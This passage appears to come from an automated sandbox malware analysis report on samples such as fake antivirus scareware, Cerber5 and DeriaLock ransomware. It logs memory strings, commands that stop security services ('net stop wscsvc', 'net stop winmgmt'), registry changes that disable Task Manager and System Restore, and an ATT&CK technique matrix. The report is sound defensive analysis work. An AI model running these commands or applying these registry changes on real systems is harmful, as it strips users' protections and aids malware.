          Source: Endermanch@Antivirus.exe, 0000000B.00000000.380424832.00000000004AE000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: this threat from your PC.You are using a trial version.It is recommended to purchase a commercial version.""Wintrust.dllCryptCATAdminCalcHashFromFileHandleCryptCATAdminEnumCatalogFromHashCryptCATAdminAcquireContextCryptCATAdminReleaseContextCryptCATCatalogInfoFromContextWM_LINK_CLICKEDWM_LINK_CLICKEDUpdateThreadStopChecking Internet connection...Starting to download updates...avtr.datswverdbverdbsignsdbverfdbsignsfavt_db/customers%s%s/%sDownloading update 100%Software successfully updated.\avt.dbswverswverdbverdbverdbsignsdbsigns%.2fdbverf%ddbsignsfDatabase version: %.2fVirus Signatures: %dUpdate cancelled.Your software is up-to-date.Your software is up-to-date.LastUpdateDownloading update %d%%Check for updatesUpdate cancelled.LastUpdate%.2fdbverf%ddbsignsfDatabase version: %.2fVirus Signatures: %dYour software is up-to-date.Your software is up-to-date.Check for updatesWM_LINK_CLICKEDTrialTahomaTahomaCTransparentStaticCSystemTrayTaskbarCreatedTrayNotifyWndTrayClockWClassShell_TrayWndSupportTrebuchet MSTrebuchet MSTahomaTahomaTahomaTahomaE-mailSubjectMessageActivate Antivirus:
          Source: Endermanch@Antivirus.exe, 0000000B.00000000.380424832.00000000004AE000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: License.txt\"notepad.exe "SecStatus_3SecStatus_4SecStatus_5FDGUID%08d%08d%08dGUID%WINDIR%%SYSDIR%Data:%d:Dataavthook.dll_StartExplorerHook@8swver3.0swverdbver1.1dbverdbsigns62577dbsignsswverdbverdbsignsdbverf1.1dbverfdbsignsf62577dbsignsfdbverfdbsignsfsplash.mp3AntivirusPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGAntivirusWintrust.dllAntivirus_AntivirusgourlAntivirus (Unregistered version)httpgourlgourlEmailclick here to fix security problemsPNGPNGPNGPNG1-866 427 1693FDLicenseSecStatus_3SecStatus_4SecStatus_5Shell_TrayWndAVT_BASIC/customers%s%s/buy.php?pid=%s&id=%s&subid=%sAntivirusYour copy already registered!AVT_BASIC/customers%s%s/buy.php?pid=%s&id=%s&subid=%sEmail/customers%s%s/auth/login/email/%sEmail/customers%s%s/auth/login/email/%sAVT_BASICGUID/customers%s%s/auth/autologin/email/%s@user.com/pid/%sAntivirusFDShell_TrayWndWM_LINK_CLICKEDLocal AppWizard-Generated ApplicationsSettings_06e722db8-b319-4933-9932-314a077920be-noscanrt8RBtVR0f1tQq9ra
          Source: Endermanch@Antivirus.exe, 0000000B.00000000.380424832.00000000004AE000.00000002.00000001.01000000.00000008.sdmp, avpc2009.exe, 00000029.00000000.458422834.0000000000516000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: Shell_TrayWnd
          Source: avpc2009.exe, 00000029.00000000.458422834.0000000000516000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: )@Shell_TrayWnd
          Source: Endermanch@Antivirus.exe, 0000000B.00000000.380424832.00000000004AE000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: Click "OK" to restart you computer now.AntivirusAll the found objects removed successfully!Shell_TrayWndButtonRAM checking available only for activated copy.
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: GetLocaleInfoA,12_2_0040A86C
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeQueries volume information: C:\Users\user\Desktop\bpkAAJptGv.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeQueries volume information: C:\Users\user\Desktop\bpkAAJptGv.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Users\user\Desktop\Endermanch@DeriaLock.exe VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: unknown VolumeInformation
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeQueries volume information: C:\Users\user\AppData\Local\6AdwCleaner.exe VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: unknown VolumeInformation
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_0040E0E1 GetSystemTime,SystemTimeToFileTime,12_2_0040E0E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E257E5 LocalAlloc,GetSystemDefaultLCID,GetTimeZoneInformation,memcpy,NetWkstaGetInfo,memcpy,memcpy,NetApiBufferFree,LocalAlloc,memcpy,LocalFree,LocalFree,20_2_04E257E5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E26FFE GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,20_2_04E26FFE
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_00406860 lstrlenA,GlobalAlloc,GetVersionExA,MultiByteToWideChar,WideCharToMultiByte,CreateStreamOnHGlobal,12_2_00406860

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\WinDefend
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Windows\antivirus-platinum.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableRegistryTools
          Source: C:\Windows\antivirus-platinum.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore DisableSR
          Source: C:\Windows\antivirus-platinum.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Security Center FirewallDisableNotify
          Source: C:\Windows\antivirus-platinum.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from FirewallProduct
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from FirewallProduct
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from AntiSpywareProduct
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from AntiSpywareProduct
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from AntiVirusProduct
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from AntiVirusProduct
          Source: Endermanch@Cerber5.exe, 00000017.00000003.529413168.0000000001873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nder\MsMpeng.exe
          Source: Endermanch@Krotten.exe.0.drBinary or memory string: C:\WINDOWS\Cursors\avp.exe
          Source: Endermanch@Cerber5.exe, 00000017.00000003.529413168.0000000001873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r\MsMpeng.exe
          Source: Endermanch@Krotten.exe.0.drBinary or memory string: Photo.exeC:\WINDOWS\Cursors\avp.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: C:\Users\user\Desktop\Fantom.exe, type: DROPPED
          Source: Yara matchFile source: 44.2.870F.tmp.7ff745e00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 44.0.870F.tmp.7ff745e00000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 44.0.870F.tmp.7ff745e00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 44.0.870F.tmp.7ff745e00000.2.unpack, type: UNPACKEDPE
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: \\192.168.2.1\admin$\infpub.dat

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: C:\Users\user\Desktop\Fantom.exe, type: DROPPED
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          1
          Valid Accounts
          111
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          911
          Disable or Modify Tools
          1
          Input Capture
          2
          System Time Discovery
          1
          Replication Through Removable Media
          11
          Archive Collected Data
          Exfiltration Over Other Network Medium14
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          Data Encrypted for Impact
          1
          Replication Through Removable Media
          1
          Scripting
          1
          Valid Accounts
          1
          Valid Accounts
          1
          Scripting
          LSASS Memory11
          Peripheral Device Discovery
          Remote Desktop Protocol2
          Man in the Browser
          Exfiltration Over Bluetooth21
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
          System Shutdown/Reboot
          Domain Accounts23
          Native API
          32
          Windows Service
          11
          Access Token Manipulation
          11
          Obfuscated Files or Information
          Security Account Manager2
          File and Directory Discovery
          SMB/Windows Admin Shares1
          Input Capture
          Automated Exfiltration1
          Non-Standard Port
          Exploit SS7 to Track Device LocationObtain Device Cloud Backups3
          Inhibit System Recovery
          Local Accounts1
          Scheduled Task/Job
          1
          Scheduled Task/Job
          32
          Windows Service
          51
          Software Packing
          NTDS237
          System Information Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer4
          Non-Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud Accounts22
          Service Execution
          21
          Registry Run Keys / Startup Folder
          113
          Process Injection
          1
          DLL Side-Loading
          LSA Secrets3
          Network Share Discovery
          SSHKeyloggingData Transfer Size Limits25
          Application Layer Protocol
          Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.common1
          Scheduled Task/Job
          1
          File Deletion
          Cached Domain Credentials251
          Security Software Discovery
          VNCGUI Input CaptureExfiltration Over C2 Channel1
          Proxy
          Jamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup Items21
          Registry Run Keys / Startup Folder
          122
          Masquerading
          DCSync41
          Virtualization/Sandbox Evasion
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Valid Accounts
          Proc Filesystem3
          Process Discovery
          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)41
          Virtualization/Sandbox Evasion
          /etc/passwd and /etc/shadow1
          Application Window Discovery
          Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)11
          Access Token Manipulation
          Network Sniffing11
          Remote System Discovery
          Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron113
          Process Injection
          Input Capture1
          System Network Configuration Discovery
          Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
          Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
          Rundll32
          KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
